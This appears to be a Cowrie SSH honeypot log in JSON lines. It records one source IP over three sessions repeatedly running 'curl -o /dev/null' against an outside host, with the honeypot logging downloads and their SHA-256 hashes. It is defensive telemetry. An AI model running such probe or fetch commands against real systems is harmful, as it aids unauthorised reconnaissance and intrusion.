{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.784039Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.789212Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.791452Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.819139Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.821110Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.824156Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.829187Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.831434Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.832198Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.842116Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.844034Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.847198Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.857255Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.857934Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.859466Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.860085Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.864473Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.871164Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.871725Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.896942Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.898950Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.900690Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.901439Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.906206Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.906862Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.909945Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.910604Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.942588Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.943801Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.944433Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.947286Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.948193Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.950885Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.952333Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.953125Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.956598Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.983181Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.983875Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.988638Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.992169Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.995730Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.996250Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:29.997662Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:29.998222Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.000658Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.026775Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.027274Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.032186Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.034539Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.039792Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.050270Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.050968Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.056426Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.062572Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.063709Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.064228Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.085160Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.086943Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.088367Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.088806Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.110898Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.111563Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.116806Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.124499Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.125120Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.144102Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.145852Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.147854Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.148320Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:30.160753Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.164163Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.182811Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:30.184485Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
